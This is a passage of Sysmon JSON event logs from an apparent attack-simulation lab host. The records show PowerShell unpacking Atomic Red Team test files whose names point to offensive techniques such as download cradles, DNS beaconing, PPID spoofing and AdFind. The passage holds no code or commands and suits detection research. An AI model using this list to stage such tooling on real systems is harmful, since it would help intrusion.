06:55:12.258","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1056.004\\src\\T1056.004\\T1056.004.vcxproj","CreationUtcTime":"2020-08-01 06:55:12.258","EventReceivedTime":"2020-08-01 06:55:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5229,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:55:12.274\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1056.004\\src\\Win32\\T1056.004.dll\r\nCreationUtcTime: 2020-08-01 06:55:12.274","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:55:12.274","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1056.004\\src\\Win32\\T1056.004.dll","CreationUtcTime":"2020-08-01 06:55:12.274","EventReceivedTime":"2020-08-01 06:55:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5230,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:55:12.274\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1056.004\\src\\x64\\T1056.004.dll\r\nCreationUtcTime: 2020-08-01 06:55:12.274","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:55:12.274","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1056.004\\src\\x64\\T1056.004.dll","CreationUtcTime":"2020-08-01 06:55:12.274","EventReceivedTime":"2020-08-01 06:55:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5231,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:12.290\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1059.001\\src\\Invoke-DownloadCradle.ps1\r\nCreationUtcTime: 2020-08-01 06:55:12.290","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:12.290","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1059.001\\src\\Invoke-DownloadCradle.ps1","CreationUtcTime":"2020-08-01 06:55:12.290","EventReceivedTime":"2020-08-01 06:55:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5232,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:12.290\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1059.001\\src\\test.ps1\r\nCreationUtcTime: 2020-08-01 06:55:12.290","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:12.290","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1059.001\\src\\test.ps1","CreationUtcTime":"2020-08-01 06:55:12.290","EventReceivedTime":"2020-08-01 06:55:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5233,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:12.337\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1071.004\\src\\T1071-dns-beacon.ps1\r\nCreationUtcTime: 2020-08-01 06:55:12.321","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:12.337","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1071.004\\src\\T1071-dns-beacon.ps1","CreationUtcTime":"2020-08-01 06:55:12.321","EventReceivedTime":"2020-08-01 06:55:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5234,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:12.337\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1071.004\\src\\T1071-dns-domain-length.ps1\r\nCreationUtcTime: 2020-08-01 06:55:12.337","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:12.337","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1071.004\\src\\T1071-dns-domain-length.ps1","CreationUtcTime":"2020-08-01 06:55:12.337","EventReceivedTime":"2020-08-01 06:55:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5235,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:12.337\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1074.001\\src\\Discovery.bat\r\nCreationUtcTime: 2020-08-01 06:55:12.337","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:12.337","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1074.001\\src\\Discovery.bat","CreationUtcTime":"2020-08-01 06:55:12.337","EventReceivedTime":"2020-08-01 06:55:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5236,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: EXE\r\nUtcTime: 2020-08-01 06:55:12.368\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1087.002\\src\\AdFind.exe\r\nCreationUtcTime: 2020-08-01 06:55:12.368","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"EXE","UtcTime":"2020-08-01 06:55:12.368","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1087.002\\src\\AdFind.exe","CreationUtcTime":"2020-08-01 06:55:12.368","EventReceivedTime":"2020-08-01 06:55:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5237,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:12.415\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1110.003\\src\\parse_net_users.bat\r\nCreationUtcTime: 2020-08-01 06:55:12.415","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:12.415","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1110.003\\src\\parse_net_users.bat","CreationUtcTime":"2020-08-01 06:55:12.415","EventReceivedTime":"2020-08-01 06:55:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5238,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:12.430\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1114.001\\src\\Get-Inbox.ps1\r\nCreationUtcTime: 2020-08-01 06:55:12.430","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:12.430","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1114.001\\src\\Get-Inbox.ps1","CreationUtcTime":"2020-08-01 06:55:12.430","EventReceivedTime":"2020-08-01 06:55:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5239,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:12.462\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1127.001\\src\\T1127.001.csproj\r\nCreationUtcTime: 2020-08-01 06:55:12.462","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:12.462","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1127.001\\src\\T1127.001.csproj","CreationUtcTime":"2020-08-01 06:55:12.462","EventReceivedTime":"2020-08-01 06:55:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5240,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:55:12.462\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1134.004\\bin\\calc.dll\r\nCreationUtcTime: 2020-08-01 06:55:12.462","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:55:12.462","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1134.004\\bin\\calc.dll","CreationUtcTime":"2020-08-01 06:55:12.462","EventReceivedTime":"2020-08-01 06:55:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5241,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:12.462\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1134.004\\src\\PPID-Spoof.ps1\r\nCreationUtcTime: 2020-08-01 06:55:12.462","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:12.462","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1134.004\\src\\PPID-Spoof.ps1","CreationUtcTime":"2020-08-01 06:55:12.462","EventReceivedTime":"2020-08-01 06:55:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5242,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:12.524\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:12.524","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:55:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5243,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:12.524\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1218.001\\src\\T1218.001.chm\r\nCreationUtcTime: 2020-08-01 06:55:12.524","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:12.524","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1218.001\\src\\T1218.001.chm","CreationUtcTime":"2020-08-01 06:55:12.524","EventReceivedTime":"2020-08-01 06:55:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5244,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:12.555\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1218.004\\src\\InstallUtilTestHarness.ps1\r\nCreationUtcTime: 2020-08-01 06:55:12.555","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:12.555","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1218.004\\src\\InstallUtilTestHarness.ps1","CreationUtcTime":"2020-08-01 06:55:12.555","EventReceivedTime":"2020-08-01 06:55:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5245,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:12.571\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1218.005\\src\\T1218.005.hta\r\nCreationUtcTime: 2020-08-01 06:55:12.571","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 